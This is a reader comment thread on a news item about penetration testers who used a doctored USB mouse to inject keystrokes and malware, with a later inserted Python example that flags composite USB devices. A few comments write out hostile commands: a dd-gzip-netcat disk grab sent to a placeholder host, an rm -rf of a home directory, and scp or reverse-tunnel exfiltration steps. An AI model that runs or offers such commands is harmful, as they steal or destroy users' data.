When hackers from penetration testing firm Netragard were hired to pierce the firewall of a customer, they knew they had their work cut out. The client specifically ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits. …
There's one in the post to you
Not saying in what form it'll reach you though.
Yes, it will
"...programmed to wait 60 seconds after being plugged in to a computer and then enter commands into its keyboard that executed malware stored on the custom-built flash drive snuck into the guts of the Logitech mouse."
That's not to say that a different attack might only send key strokes, but this one used an external drive that is easily blocked.
Same attack on Linux
Do I take it if such an attack would be targeted at Linux (or other *nix) - that although the mouse would indeed be recognised as a mouse (or keyboard) by the kernel and subsequently allowed to pass commands to the current screen or terminal - it would really be limited to the privileges of the currently logged user? Thus, if this attack would be run against a reasonably secured box - without additional sophisticated privilege escalation techniques - I assume it would have really limited impact, due to the limited privileges normally assigned to a regular user?
Well, unless I'd sudo'ed already. Or have a terminal open to another box. Or ...
And some people are using it for marketing.
Just don't count on that!
It's easy to code a loop waiting for "su" or "sudo" at the beginning of a character string.
No OS is safe against this because it's a hardware-level attack. The same thing happens if somebody would embed malicious code into the firmware of your hard-disk or network card.
Oh, and for the same reason, two factor authentication will not work either.
The solution to this would be a DRM-like scheme where the CPU will not trust any piece of hardware unless cryptographic signatures are verified and found to be correct. Would you like that kind of PC?
@Same attack on Linux
Yes and no.
The basic idea is the same, if you can move the mouse and/or type key strokes you can do a LOT.
It is also likely (e.g. on Ubuntu) that you could have a USB drive auto-mounted with a known name (based on the volume ID/name), so loading arbitrary software is also possible.
Now unless you were lucky and able to type in a terminal opened for root (or recently sudo-ed) and the user is privileged and not terribly observant, escalating is not as likely, but still possible depending on the user and/or exploits you can muster.
But if all you wanted to do was slurp the contents of the user's home directory and/or reveal network details that could help another attack, which could have a wealth of sensitive information, then it is easy! Without attempting to hide your operations, just open the command dialogue with Alt+F2, then enter a command such as scp or rsync with details of a dodgy destination server...
@Just don't count on that
As a 'mouse' or other USB device it would not know what was typed on another keyboard-like input device, so not that simple.
But if you did the same modification to a keyboard, then yes it is quite simple...
Not that easy...
"It's easy to code a loop waiting for "su" or "sudo" at the beginning of a character string." But how do you get that code to run and how do you get that info out to the USB device?
The only way to do that would be by attacking the keyboard where the data is available.
"No OS is safe against this because it's a hardware-level attack." It is not a hardware level attack, but an OS level one. If you were using a software environment that only ran a specific application with no ability to start a new shell etc, then this would not work.
@Not that easy...
Ok, build it into the keyboard. Then you know it's typed.
Or run a program at the current execution level that pretends to be your desktop (thus getting all keystrokes and mouse movement) and display some sort of error that you'd want to raise your login level to fix...
Hackers pierce network with jerry-rigged mouse
"the technique can work against a variety of operating systems, not just Windows."
More details, or it's just FUD.
You want details? Go read my Launchpad bug linked above.
The USB device pretends to be the user typing on a keyboard
So it can do anything the user can, as long as it doesn't need to know anything the user knows.
In other words, it can do anything the user might be able to do without a password. If you already know the target operating system (or have a list of target operating systems), then it can issue suitable keyboard commands to upload interesting information, or download a program to do interesting things.
Ok, your device only has user privileges, but for a lot of attacks that may be enough.
Which leads to the question - should you be worried?
I'd say that unless you're doing something particularly secret and juicy, I doubt it as the attack is pretty expensive - and if the mark tosses the freebie into the bin, notices something odd and pops the lid, or even simply uses it on a system that doesn't contain the stuff you're trying to get, then it fails.
Cool idea though - hats off to PJRC and/or Atmel for the very-subtle marketing ploy.
Well, I'd be worried even if I wasn't doing something...
... particularly secret or juicy.
You don't need sudo privileges for rm -rf /home/current_user/* to do significant damage to your account.
... has always been a game of cat and mouse.
A software restriction policy is useful protection.
A software restriction policy might not prevent all malicious actions possible with this kind of exploit, but it would prevent malware being launched on the PC from the mouse's USB memory. Which I assume is the main component of the exploit, the mouse's controller being preprogrammed to simulate the clicks needed to do this.
If the user is limited, then the mouse controller would also find it hard to circumvent the policy by copying the malware to the computer's HD, since locations which are writable to a limited user will typically not permit software launch.
Clever - but not new
An inline input device can trivially
- Capture all keystrokes and log to its hardware store for later retrieval
- Be made to transmit all keypresses and mouse movements wirelessly
- Switch from 'user input' mode to 'remote input' mode, to override input
- Inject key sequences in a pre-defined sequence
- Upload code to the target machine - this is the most complex of all (usually requires exploit code to avoid detection by o/s/AV) - refer to this article
- Uploaded code can be used to do keylogging, screen grabs, remote access and upload captured data (hidden locally) via http to a remote site - all easy to do and simple to avoid anti-virus
Hell - if you don't believe me, try to prove me wrong and I'll cite you a 'how-to' for every single one!
Um, neat idea but very limited in practice
The device sends keyboard commands from a device that no-one would suspect is sending such commands - clever. But those commands are useless unless the software on the connected computer is PRECISELY what those keyboard commands are expecting - the device has no way of telling that the computer is not in fact running McAfee (and indeed, some very particular version of McAfee) but some other anti-virus or no anti-virus at all (not to mention the keystrokes required to launch some software from the device in the first place).
The commands being sent to the computer could very well lead to some very odd behaviours if it isn't the expected OS and software on the computer, instantly revealing that something is afoot.
Sure, usual strategies for identifying and removing the source of such odd behaviours are not going to work, but the net result will be the same - odd behaviours, not a compromised computer (unless and until the "perfect storm" of required OS and anti-virus software etc somehow contrives to later appear on the attached computer).
Similarly, I struggle to believe that a universal set of commands can be made to work regardless of the OS on the connected PC.
Yes, the technique can be made to work against a variety of OS's, but any one such device once made is going to be very firmly bound to just one OS.
Which brings me to another problem with this technique as a practical threat...
Yes, everyone picks up promotional USB drives at conferences and events and merrily plugs them into their computers without thinking. But a mouse? Really?
How do we get this device into the hands of someone we wish to attack?
"Here, take this mouse - oh wait. Can I just ask, what OS do you use? Oh Linux... OK, in that case, can you take this mouse instead...? Uh, and what anti-virus package do you use? OK, forget that mouse, this is the one... oh, um, what version of XYZ anti-virus is that...? ah.. hang on a minute... oh no, sorry, we don't have a mouse for that one."
Setting aside motivation and whether something is A Good Idea™ in terms of its goals, clever ideas need practical applications, otherwise they might just as well be dumb ideas.
As far as I can see, this one has Dumb Idea written all over it.
@Um, neat idea but very limited in practice
This is a highly targeted attack needing money & skill. Not a mass market drive-by sort of web browser hack for mum & dad's ageing PC.
I suspect anyone deploying this will have done their homework and got a good idea of what the victim is using. Most likely it will be the "corporate Windows image" for 99% of the workforce, so you can work from that point onwards...
Can you read?
FFS. Did you read the article?
"To get someone from the target company to use the mouse, Netragard purchased a readily available list names and other data of its employees. After identifying a worker who looked especially promising, they shipped him the modified mouse, which they put back in its original packaging and added marketing materials so the shipment would look like it was part of a promotional event."
"Three days later, the malware contained on the mouse connected to a server controlled by Netragard"
Not an idea... they actually managed to do it!
"How do we get this device into the hands of someone we wish to attack?"
They've just done exactly that. It's a shame you think it's a "Dumb Idea", but since the customer hired Netragard, and not a commenter on The Register, I expect we can leave the expert assessment to them.
It doesn't need to install malware nor worry about A/V.
It can install goodware with malintent.
This changes the game as the dumb user becomes a genius hacker "avatar" by proxy.
Anything you can do physically at the machine, it can do too thus:
use a browser to get and install putty vnc winscp
configure putty with a private key
ssh into remote machine and create reverse tunnel for vnc
configure winscp, login to attacker machine, send *.* or whatever
On linux, in a root terminal this will grab an entire hard drive until noticed:
nice -n 19 dd if=/dev/sda bs=4096 | gzip | nc badguy port
All it has to do is pick a time when machine is on and owner not there.
It *can* work
As long as the internal logic on the device contains enough memory and instructions, the enhanced mouse can be used in any environment. The device could deduce from the user's input whether the system is Windows, Linux or something else. Waiting for typical commands such as ls, cat, vi and so on would lead the device to think we're in Linux land, whereas cmd, dir, Win+R and other keystroke combinations would be a sign of Windows.
The attack can never be idiot proof due to system configurations, reliance on system utilities that aren't there, disabled terminal access, firewall settings and so forth. But grabbing the user's own data and sending it with e.g. FTP would work in most settings, I'm sure.
You're pretty naive. This was an idea that was implemented in a reasonably trivial piece of software, but it was trivial and it worked.
A cleverer use of this exploit would be to buffer the keystrokes and run heuristic detection based on the commands entered. In reality there's Windows, and there's Unix, and there's also the way the USB driver stacks interact with the device. With enough logging, information and time for the inbuilt computer to get a pretty good idea of which environment it's being used in, it can be used to download and execute a bootstrap mechanism which can then go on to do the real damage. It can even use its internal clock and a delay mechanism to wait until the dead of night and minimize the risk that the user can detect what's going on.
Or if so inclined, a hacker could program the device to try several trial and error strategies, waiting for a software callback that would be initiated by successfully bootstrapping a piece of malware.
The possibilities are numerous.
I have been saying for years...
Beware the Geeks bearing gifts.
USB = Universal Security Breach
or Unlimited Security Breach
Very neat attack, although I must admit being told you couldn't use "social networks, telephones, and other social-engineering vectors" is kind of like testing a body armour and saying "Oh, but you can't shoot at the head, arms or legs", i.e. knowing there are already serious shortfalls in the protection in those areas.
... they probably had someone much cheaper doing the ordinary "social networks, telephones and other social-engineering vectors" testing, or already had them done. Or the point was to prove to somebody that those aren't the exclusive points of attack rather than that the system is safe.
What's this, a story about hackers that contains hackers? Been a while.
Nice, this is how I define hacking and not the ability to launch a DDOS.
Highlights the need for a SecureUSB standard where the admin approves hardware devices.
It would probably be difficult to implement for little gain. Although it could be done, I guess, in software with something like UUIDs. But then you would need to think about protecting from UUID spoofing. And it would be a total PITA to constantly manage hardware replacements.
It's easier to deny access to USB/PS2 ports completely and then you're safe(er).
"The client specifically ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits."
FAIL - they used both social engineering and physical access.
Seems like noone noticed...
This is the first in a lot of comments that has actually pointed this out while everyone else is congratulating the hackers... reading comprehension much?
(1) It depends on how you define "social engineering", as in this case they did not manipulate the target beyond posting the device to a selected individual.
(2) They did not have local physical access. They did not break in to the building or its infrastructure. This was a real Trojan horse, or more precisely, a Trojan mouse.
So I would say they did the job, and I would also say that asking for your defences to be tested while ruling out some of the known attack vectors is a bit dumb of the hiring company.
"Look at the size of my door lock! Bet you can't pick it!"
"Where are your window locks?"
My hats off to them
This is what pen testing is all about, nice work to those guys. The scary thing is other countries like China & Russia do this all day every day to the US and their own people. Small businesses that work or collaborate with government contractors are just a stepping stone to the big fish they want to sink their programming hooks in...
Shouldn't normally work
They had to know which antivirus to suppress, AND they needed that antivirus to not scan removable media nor intervene with a sandbox until the user intervenes and changes the default, which normally there is no command line to be rid of so the device would have to emulate a mouse, run a program to find the popup which it can't, so it's game over.
It could try to connect remotely but a firewall "might" stop that. I'm not suggesting it couldn't work but you would need to know more about your target than (nothing really, social engineering of some sort is needed even if it is not a social networking site or phone calls).
Also, as a matter of routine removable storage is disabled on critical systems and those networked to them. There would be no volume mounted to execute the payload from.
You need to read the article again.
so - this is a complete FAIL
"ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits"
FAIL as social engineering was used.
Eloquent hack, but invalid.
HAHAHAHAHAHAHA and then again AHAHAHAHAHAHAHAHAHAHAHAHA...brilliant.
Arduino is an Italian masculine first name, meaning...
Hands up who's just taken their mouse apart to check?
My excuse was it needed a clean ;-)
Beware the "Free Lunch"
So they sent the doctored mouse to an employee as a "sales promotion."
Oh look at the great free mouse someone sent me! Think I'll take it to the office and try it out!
See, nothing in life is truly "Free" LOL
I am reminded of that TV show, Danger Mouse...
60% of people plug thumbdrives they find outside into computers?
Ugh. I would not plug any item I found in a car park into my computer any more than I would eat a stepped-on pie or sandwich I saw lying on the pavement. Yuck!
Unsolicited gifts are also a point of suspicion, and have been to me since the 70s. Despite there being laws against it, I occasionally got "gifts" sent in that were subsequently invoiced for, or was supposed to retain only if I took out a subscription or something. While the law technically allowed me to keep whatever was sent, the trouble the senders usually caused over it made it not worth keeping. So from that, I have a healthy skepticism concerning unsolicited deliveries. Seems like there's another reason to keep that going now.
I admire your self-control. While I'm fairly paranoid about security I'm afraid to say it's almost certain that my curiosity would get the better of me (regarding the thumb drive, not the stepped-on pie).
Having said that, it would be tried in a non-networked sacrificial laptop that would be nuked and re-imaged immediately afterwards. There's quite a wide margin between curiosity and idiocy.
.. only shows human beings are the weakest link.
Why would an OS allow a mouse to 'type'
This seems like a flaw in the OS. The built-in driver code that handles HID devices like keyboards and mice is able to distinguish between the two, so it ought to default to not letting a mouse send characters. If you really have some weird need for that, fine, you can tweak the registry or whatever.
Hopefully the Linux kernel guys have already seen this and checked in such a fix, and presumably after going through five layers of middle management, Microsoft will do so also.
I hope, as well, that any other USB device that isn't a keyboard or mouse, like a USB key, phone, hard drive, printer, modem, etc. would also not be allowed to act as a HID device and send either keyboard characters or mouse movements/button presses (which in a GUI, along with cut and paste, could probably be used to 'type' commands as well, albeit with a bit higher level of difficulty).
It goes without saying that devices you don't expect to mount a filesystem, like a keyboard, mouse or printer, should not be able to do so.
Clearly the guys programming USB code have never thought for a moment about basic security!
Because it identifies itself as both. Imagine you plugged in a mini hub into which was already plugged both a mouse and keyboard. What would the OS see? That's what this device effectively is.
It isn't just a mouse. Think of it as plugging in a usb hub with a mouse and a keyboard attached.
Actually, it's one device with multiple roles.
The generic HID device allows you to define multiple endpoints in the *same* device, thus one HID-compliant device can be both the mouse and the keyboard.
The HID device I'm typing on right now is also my mouse - according to Windows 7, it's one device that sits in both the Keyboard and Mouse categories.
There's a lot of them around - it just tells the OS that it's both. Windows normally enumerates it saying "HID-compliant device" if it says anything and doesn't actually say whether it thinks it's a keyboard or mouse.
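The "one device, multiple roles" point in the comments above is visible in the USB configuration descriptor the device hands the host at enumeration. As an added example (not code from the article, Netragard, or any commenter), the Python below builds constructed descriptor bytes for a plain mouse and for a composite mouse+keyboard+storage device, walks them the way an enumeration check could, and flags any device that claims more than the mouse role it was sold as. All descriptor values are hand-constructed for illustration, not captured from a real product.

```python
import struct

# USB descriptor type codes and class codes (USB 2.0 / HID 1.11 specs).
DT_CONFIG, DT_INTERFACE, DT_ENDPOINT, DT_HID = 0x02, 0x04, 0x05, 0x21
CLASS_HID, CLASS_MASS_STORAGE = 0x03, 0x08
# HID boot-interface subclass 1 with protocol 1 = keyboard, 2 = mouse.
HID_BOOT, HID_PROTO_KEYBOARD, HID_PROTO_MOUSE = 0x01, 0x01, 0x02

def interface_desc(num, cls, sub, proto, n_endpoints=1):
    """9-byte interface descriptor (bLength, bDescriptorType, bInterfaceNumber, ...)."""
    return struct.pack("<BBBBBBBBB", 9, DT_INTERFACE, num, 0, n_endpoints, cls, sub, proto, 0)

def endpoint_desc(addr, attrs=0x03, max_packet=8, interval=10):
    """7-byte endpoint descriptor; bmAttributes 0x03 = interrupt, 0x02 = bulk."""
    return struct.pack("<BBBBHB", 7, DT_ENDPOINT, addr, attrs, max_packet, interval)

def hid_desc():
    """Minimal 9-byte HID class descriptor (bcdHID 1.11, one report descriptor)."""
    return struct.pack("<BBHBBBH", 9, DT_HID, 0x0111, 0, 1, 0x22, 50)

def config_desc(interfaces):
    """Wrap one blob per interface in a configuration descriptor with a correct wTotalLength."""
    body = b"".join(interfaces)
    return struct.pack("<BBHBBBBB", 9, DT_CONFIG, 9 + len(body), len(interfaces), 1, 0, 0x80, 50) + body

def parse_roles(config):
    """Walk the descriptor chain by bLength and return the role each interface claims."""
    if len(config) < 9 or config[1] != DT_CONFIG:
        raise ValueError("not a configuration descriptor")
    total = min(struct.unpack_from("<H", config, 2)[0], len(config))  # honour wTotalLength
    roles, pos = [], 0
    while pos + 2 <= total:
        length, dtype = config[pos], config[pos + 1]
        if length < 2 or pos + length > total:
            raise ValueError("malformed descriptor at offset %d" % pos)
        if dtype == DT_INTERFACE and length >= 9:
            cls, sub, proto = config[pos + 5], config[pos + 6], config[pos + 7]
            if cls == CLASS_HID and sub == HID_BOOT and proto == HID_PROTO_KEYBOARD:
                roles.append("keyboard")
            elif cls == CLASS_HID and sub == HID_BOOT and proto == HID_PROTO_MOUSE:
                roles.append("mouse")
            elif cls == CLASS_HID:
                roles.append("hid-other")  # non-boot HID: the report descriptor decides
            elif cls == CLASS_MASS_STORAGE:
                roles.append("storage")
            else:
                roles.append("class-0x%02x" % cls)
        pos += length  # HID and endpoint descriptors are skipped by their own bLength
    return roles

def suspicious(roles):
    """A device sold as a mouse should claim the mouse role and nothing else."""
    return set(roles) != {"mouse"}

# Constructed descriptors (hypothetical, not from any real product): a plain mouse and
# a composite device that also enumerates as a keyboard and a disk on the same plug.
PLAIN_MOUSE = config_desc([
    interface_desc(0, CLASS_HID, HID_BOOT, HID_PROTO_MOUSE) + hid_desc() + endpoint_desc(0x81),
])
TROJAN_MOUSE = config_desc([
    interface_desc(0, CLASS_HID, HID_BOOT, HID_PROTO_MOUSE) + hid_desc() + endpoint_desc(0x81),
    interface_desc(1, CLASS_HID, HID_BOOT, HID_PROTO_KEYBOARD) + hid_desc() + endpoint_desc(0x82),
    interface_desc(2, CLASS_MASS_STORAGE, 0x06, 0x50, 2)
    + endpoint_desc(0x83, 0x02, 64, 0) + endpoint_desc(0x03, 0x02, 64, 0),
])

if __name__ == "__main__":
    for name, desc in (("plain mouse", PLAIN_MOUSE), ("trojan mouse", TROJAN_MOUSE)):
        r = parse_roles(desc)
        print("%-12s roles=%s suspicious=%s" % (name, r, suspicious(r)))
```

On a real host the same walk would run over the descriptor the kernel exposes for each newly attached device, which is the information an admin-approval policy of the kind suggested earlier in the thread would have to compare against an allow-list.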
usb live ...
...couldn't you have this begin a USB live Linux on the next start? All user interfaces are locked out while the screen reads "Update in progress" with an X minute countdown timer, and it would have relatively free rein within the machine.
Paris, because she would leave for a break...